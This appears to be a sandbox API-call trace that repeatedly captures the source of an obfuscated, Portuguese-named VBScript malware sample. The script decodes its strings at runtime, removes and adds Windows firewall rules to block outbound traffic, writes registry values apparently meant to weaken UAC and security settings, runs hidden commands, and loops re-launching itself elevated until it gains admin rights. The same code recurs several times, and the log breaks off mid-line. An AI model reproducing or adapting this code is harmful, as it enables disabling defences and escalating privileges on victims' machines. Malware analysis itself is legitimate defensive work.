bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 82 [0222.983] wcsncmp (_String1="TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 71 [0222.983] wcsncmp (_String1="CP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 54 [0222.983] wcsncmp (_String1="P = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 67 [0222.983] wcsncmp (_String1=" = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run 